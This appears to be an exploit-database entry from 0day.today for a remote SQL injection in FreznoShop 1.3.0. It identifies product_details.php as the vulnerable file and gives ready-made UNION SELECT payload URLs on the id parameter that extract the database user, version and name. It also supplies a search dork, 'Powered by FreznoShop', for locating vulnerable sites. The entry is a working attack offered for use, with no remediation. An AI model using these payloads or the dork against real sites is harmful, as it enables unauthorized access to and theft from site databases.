FreznoShop 1.3.0 (id) Remote SQL Injection Vulnerability

2009-04-13T00:00:00
ID 1337DAY-ID-5026
Type zdt
Reporter NoGe
Modified 2009-04-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
FreznoShop 1.3.0 (id) Remote SQL Injection Vulnerability
========================================================


======================================================================================


  [o] FreznoShop 1.3.0 SQL Injection Vulnerability

       Software : FreznoShop version 1.3.0
       Vendor   : http://sourceforge.net/projects/freznoshop/
       Download : http://sourceforge.net/project/platformdownload.php?group_id=86090
       Author   : NoGe

======================================================================================


  [o] Vulnerable file

       product_details.php



  [o] Exploit

       http://localhost/[path]/product_details.php?id=[SQL}
		product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11--
		product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11,12--



  [o] Dork

       "Powered by FreznoShop"


======================================================================================




#  0day.today [2018-01-01]  #